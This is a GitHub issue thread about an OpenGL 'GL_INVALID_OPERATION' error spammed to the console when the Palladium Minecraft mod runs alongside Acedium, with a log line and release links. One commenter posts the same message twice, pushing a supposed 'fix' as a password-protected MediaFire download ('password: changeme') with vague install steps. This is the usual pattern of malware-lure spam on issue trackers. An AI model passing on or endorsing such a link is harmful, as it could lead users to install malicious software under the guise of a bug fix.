### ISSUE TITLE
Acedium GL Error spam

### ISSUE THREAD

**Issue by GiantLuigi4** [ITsMrToad/PalladiumMod#13]
When Palladium is installed with acedium, a GL error gets spammed to console
```
[23:25:08] [Render thread/INFO] [mojang/GlDebug]: OpenGL debug message: id=1282, source=API, type=ERROR, severity=HIGH, message='GL_INVALID_OPERATION error generated. Uniform must be a matrix type in call to UniformMatrix*.'
```

https://github.com/ferriarnus/acedium/releases/tag/v0.2.7-1.20.1
https://www.curseforge.com/minecraft/mc-mods/embeddium/files/5630140

I'm not sure if this causes any graphical artifacts, but it exists

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by ITsMrToad** [comment]
Send full log.
